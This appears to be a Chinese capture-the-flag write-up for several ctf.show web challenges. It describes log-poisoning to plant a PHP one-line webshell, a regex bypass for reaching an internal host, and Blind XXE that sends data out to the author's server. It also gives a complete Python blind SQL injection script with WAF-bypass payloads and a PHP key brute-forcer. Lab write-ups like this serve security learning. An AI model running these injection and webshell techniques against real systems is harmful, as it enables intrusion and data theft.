簽到_觀己
從題目描述中沒發現什么有用的信息
發現文件包含
嘗試使用PHP偽協議執行命令,發現無法執行
嘗試使用遠程文件包含,發現也未開啟
嘗試使用日志注入
記錄了UA值,抓包寫入一句話木馬
使用蟻劍連接
web1_觀字
發現正則過濾,目的是訪問內網靶機http://192.168.7.68/flag
使用。代替.繞過正則過濾
web2_觀星
發現URL可以使用數字類型運算,嘗試注入
在SQL注入中利用MySQL隱形的類型轉換繞過WAF檢測
寫腳本嘗試盲注(感謝羽師傅的提示)
#! /usr/bin/env python
# _*_ coding:utf-8 _*_
import requests
url = "http://2490cccb-ed3d-451e-94c6-54d36cf9a872.chall.ctf.show/index.php?id=3-"
#regexp代替=
def databases():
database = ""
for i in range(1, 50):
x = 0
for j in range(32, 135):
payload = "case(" \
"ord(" \
"substr(" \
"(select(database()))" \
"from({0})for(1)" \
")" \
")" \
")" \
"when({1})then(0)else(1)end".format(i, j)
text = requests.get(url + payload).text
if "I asked nothing" in text:
database += chr(j)
x = 1
if j == 132:
if x == 0:
print("database name :" + database )
exit()
def tables():
table = ""
for i in range(1, 50):
x = 0
for j in range(32, 135):
payload = "case(" \
"ord(" \
"substr(" \
"(select(group_concat(table_name))from(information_schema.tables)where(table_schema)regexp(0x77656231))" \
"from({0})for(1)" \
")" \
")" \
")" \
"when({1})then(0)else(1)end".format(i, j)
text = requests.get(url + payload).text
if "I asked nothing" in text:
table += chr(j)
x = 1
if j == 132:
if x == 0:
print("table name:" + table )
exit()
def columns():
column = ""
for i in range(1, 50):
x = 0
for j in range(32, 135):
payload = "case(" \
"ord(" \
"substr(" \
"(select(group_concat(column_name))from(information_schema.columns)where(table_name)regexp(0x666c6167))" \
"from({0})for(1)" \
")" \
")" \
")" \
"when({1})then(0)else(1)end".format(i, j)
text = requests.get(url + payload).text
if "I asked nothing" in text:
column += chr(j)
x = 1
if j == 132:
if x == 0:
print("column name:" + column )
exit()
def getflag():
flag = ""
for i in range(1, 50):
x = 0
for j in range(32, 135):
payload = "case(" \
"ord(" \
"substr(" \
"(select(group_concat(flag))from(flag))" \
"from({0})for(1)" \
")" \
")" \
")" \
"when({1})then(0)else(1)end".format(i, j)
text = requests.get(url + payload).text
if "I asked nothing" in text:
flag += chr(j)
x = 1
if j == 132:
if x == 0:
print("flag is:" + flag )
exit()
databases()
#tables()
#columns()
#getflag()
web3_觀圖
查看網頁源代碼
發現一個PHP文件
確定PHP版本
嘗試爆破'ctfshow'.rand()中rand()所產生的值
openssl需要開啟拓展,修改php.ini文件即可
<?php
$len = rand();
print ($len."\n");
for($i=0;$i<$len;$i++){
$key = substr(md5('ctfshow'.$i),3,8);
$image="Z6Ilu83MIDw=";
$str = openssl_decrypt($image, 'bf-ecb', $key);
if(strpos($str,"gif") or strpos($str,"jpg") or strpos($str,"png")){
print($str." ");
print($i);
break;
}
}
?>
爆破成功,加密得到秘鑰key,並加密“config.php”
<?php
$i = 27347;
$key = substr(md5('ctfshow'.$i),3,8);
$c = "config.php";
print(openssl_encrypt($c,'bf-ecb', $key));
?>
訪問該文件
由於會轉換文件類型為gif,所以無法直接看到文件內容,需要下載文件再處理
web4_觀心
抓取數據包
發現關鍵信息,猜測為xxe漏洞
發現無回顯,在大佬的提示下,該漏洞為Blind XXE
XXE防御利用技巧:從XML到遠程代碼執行
XXE及Blind_OOB_XXE
在API接口訪問http://IP地址/test.xml
查看vps中1.txt的內容
